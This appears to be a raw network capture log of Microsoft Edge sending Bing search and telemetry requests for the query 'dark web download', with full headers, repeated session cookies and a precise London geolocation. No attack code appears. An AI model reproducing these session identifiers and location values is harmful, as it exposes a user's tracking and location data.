cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23124
GET

https://www.bing.com/fd/ls/GLinkPing.aspx?IG=A25C00CFF6AE4E4F8E05C979C0ADBEF7&ID=autosuggest,5004.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:1541}

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/GLinkPing.aspx?IG=A25C00CFF6AE4E4F8E05C979C0ADBEF7&ID=autosuggest,5004.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:1541} HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23125
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306945475%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A9%2C%20%5C%22GL%5C%22%3A7%2C%20%5C%22IG%5C%22%3A%5C%22A25C00CFF6AE4E4F8E05C979C0ADBEF7%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306945475%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%20web%20download%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306947014%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adarkweb%20d%2Ci%3A2%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306945475%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A9%2C%20%5C%22GL%5C%22%3A7%2C%20%5C%22IG%5C%22%3A%5C%22A25C00CFF6AE4E4F8E05C979C0ADBEF7%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306945475%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%20web%20download%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306947014%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f2312d
GET

https://www.bing.com/search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /search?q=dark+web+download&qs=OS&pq=darkweb+d&sk=CT1&sc=10-9&cvid=202035EC43B64C3DBF7FE10F53408EC5&FORM=QBRE&sp=2&ghc=1&lq=0 HTTP/2.0
host: www.bing.com
ect: 4g
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: same-origin
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f23353
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 270
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f2335b
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 3233
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901
cookie: bm_sv=92B6648A3566D89CB40DC5CD6ADADF6C~YAAQTTZ6XEGqT4iTAQAAVzklkRoz7UG6B9giGaFlfuJ/2C6It6eWoQslESq6Fdd7/PCigwnPkrdlmXOZARuiCLeDbM4GdiP8F+gnfdD7ZbfNQYBma6gOikn1nmhYIvUADJjzZaPIBPXl2ZSlHCvmQrIBLMV94aXrJD/1PmT8WdvbsZ/1RL6sCQtqykaQjyUYwA6NNQbQRyU+MQ5OP3pWyUxmkLswE5L0+IPJ53N7kkFCES+rJyDKsarLiBc1mA==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306956.7f233c0
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 265
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
